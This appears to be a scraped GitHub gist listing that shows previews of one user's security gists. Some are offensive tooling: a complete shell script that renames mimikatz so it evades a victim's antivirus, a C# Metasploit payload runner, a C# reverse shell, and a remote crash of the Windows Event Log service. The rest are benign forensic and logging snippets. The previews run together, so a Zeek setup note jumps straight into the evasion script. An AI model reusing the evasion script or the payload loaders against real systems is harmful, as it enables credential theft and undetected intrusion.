Jesse Moore jessefmoore
@jessefmoore
jessefmoore / quick_and_dirty_zeek_into_elastic.md
Created May 2, 2020 18:43 — forked from neu5ron/quickly_get_zeek_into_elastic.md
hackathon quick hack to get into any Elastic

Understanding of Zeek Fields

use the following OSSEM branch

Prep Elasticsearch

You only need to do this once; if you have already done it, skip this section and go to the "Upload data" section.

Log in to your Kibana instance and go to Dev Tools (the wrench icon in the bottom left).

# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
@jessefmoore
jessefmoore / WAHH_Task_Checklist.md
Created July 27, 2020 14:36 — forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
@jessefmoore
jessefmoore / msfsharp.cs
Created August 13, 2020 14:44
Run MSF payloads from C#
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace UnmanagedCode
{
    class Program
    {
        [DllImport("kernel32")]
        static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode);
@jessefmoore
jessefmoore / reverse2.cs
Created August 13, 2020 14:50
C# Reverse Shell
/*
Reference: http://www.codeproject.com/Articles/20250/Reverse-Connection-Shell
*/
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
@jessefmoore
jessefmoore / eventvwr_crash.py
Created September 19, 2020 03:29 — forked from byt3bl33d3r/eventvwr_crash.py
Crash the Windows Event Log service remotely (needs admin privs)
# Crash the Windows Event Log Service remotely, needs Admin privs
# originally discovered by limbenjamin and accidentally re-discovered by @byt3bl33d3r
#
# Once the service crashes 3 times it will not restart for 24 hours
#
# https://github.com/limbenjamin/LogServiceCrash
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
#
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)
<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
<head>
<title>Olaf subscriptions in feedly Cloud</title>
</head>
<body>
<outline text="PublicFeeds" title="PublicFeeds">
<outline type="rss" text="top scoring links : netsec" title="top scoring links : netsec" xmlUrl="http://www.reddit.com/r/netsec/top/.rss" htmlUrl="https://www.reddit.com/r/netsec/top/"/>
<outline type="rss" text="For [Blue|Purple] Teams in Cyber Defence" title="For [Blue|Purple] Teams in Cyber Defence" xmlUrl="https://www.reddit.com/r/blueteamsec.rss" htmlUrl="https://www.reddit.com/r/blueteamsec"/>
@jessefmoore
jessefmoore / pydefendercheck.py
Created September 24, 2020 21:24 — forked from daddycocoaman/pydefendercheck.py
PyDefenderCheck
##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################
import argparse
import enum
LOCATION=$(curl -s https://api.github.com/repos/<YOUR ORGANIZATION>/<YOUR REPO>/releases/latest \
| grep "tag_name" \
| awk '{print "https://github.com/<YOUR ORGANIZATION>/<YOUR REPO>/archive/" substr($2, 2, length($2)-3) ".zip"}') \
; curl -L -o <OUTPUT FILE NAME> "$LOCATION"

for example:

LOCATION=$(curl -s https://api.github.com/repos/byt3bl33d3r/CrackMapExec/releases \
| grep "tag_name" \
@jessefmoore
jessefmoore / stickynoteparser.py
Created October 16, 2020 15:31 — forked from daddycocoaman/stickynoteparser.py
Parses sticky note files in .snt/.sqlite formats. Sqlite files may require the WAL and SHM files of the same name as well. Once run, WAL/SHM files will be merged into .sqlite file.
import json
import sqlite3
import olefile
import argparse
def parse_snt_file(file):
    # https://www.tutorialspoint.com/python_digital_forensics/python_digital_forensics_important_artifacts_in_windows
    if not olefile.isOleFile(file):
        return "Invalid OLE file"